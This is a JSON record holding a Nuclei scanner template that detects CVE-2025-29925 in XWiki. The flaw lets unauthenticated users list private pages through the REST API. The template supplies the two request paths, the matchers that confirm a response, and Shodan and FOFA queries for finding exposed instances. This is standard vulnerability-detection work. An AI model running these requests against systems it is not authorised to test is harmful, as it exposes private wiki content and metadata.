{
	"uri": "http/cves/2025/CVE-2025-29925.yaml",
	"id": "CVE-2025-29925",
	"name": "XWiki REST API - Private Pages Disclosure",
	"author": [
		"ritikchaddha"
	],
	"tags": [
		"cve",
		"cve2025",
		"xwiki",
		"rest-api",
		"exposure"
	],
	"severity": "high",
	"type": "http",
	"dir": "http/cves/2025",
	"ref": "projectdiscovery/nuclei-templates:7b2bb92261a4",
	"vendor": "xwiki",
	"product": "xwiki",
	"classification": {
		"cwe-id": [
			"cwe-285"
		],
		"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
		"cvss-score": 7.5,
		"cpe": "cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*"
	},
	"metadata": {
		"fofa-query": "body=\"data-xwiki-reference\"",
		"max-request": 2,
		"product": "xwiki",
		"shodan-query": "html:\"data-xwiki-reference\"",
		"vendor": "xwiki",
		"verified": true
	},
	"digest": "4a0a00473045022100c8a6fd245b0a03df19398c7423e59c81052ea01692fe150b68928ca74f15d37202203fc99dcf07ab5004c3a28cca3ba2be6f71f1e0ea9c52c49c2a802653c14833e1:922c64590222798bb761d5b6d8e72950",
	"created_at": "2025-08-28T13:41:55Z",
	"updated_at": "2025-08-29T10:14:00Z",
	"release_tag": "v10.2.8",
	"raw": "id: CVE-2025-29925\n\ninfo:\n  name: XWiki REST API - Private Pages Disclosure\n  author: ritikchaddha\n  severity: high\n  description: |\n    A vulnerability in XWiki's REST API allows unauthenticated users to access information about private pages through the pages endpoint. This could lead to disclosure of sensitive information and page metadata.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cwe-id: CWE-285\n    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: xwiki\n    product: xwiki\n    shodan-query: html:\"data-xwiki-reference\"\n    fofa-query: body=\"data-xwiki-reference\"\n  tags: cve,cve2025,xwiki,rest-api,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/{{path}}\"\n\n    payloads:\n      path:\n        - \"rest/wikis/xwiki/pages?space=\"\n        - \"xwiki/rest/wikis/xwiki/pages?space=\"\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<pageSummary\"\n          - \"<pages\"\n          - \"<xwikiRelativeUr\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/xml\"\n          - \"text/javascript\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c8a6fd245b0a03df19398c7423e59c81052ea01692fe150b68928ca74f15d37202203fc99dcf07ab5004c3a28cca3ba2be6f71f1e0ea9c52c49c2a802653c14833e1:922c64590222798bb761d5b6d8e72950",
	"template_id": "CVE-2025-29925",
	"description": "A vulnerability in XWiki's REST API allows unauthenticated users to access information about private pages through the pages endpoint. This could lead to disclosure of sensitive information and page metadata.\n",
	"filename": "CVE-2025-29925.yaml",
	"template_type": "public",
	"is_new": true,
	"is_pdteam": true,
	"is_pdtemplate": true
}
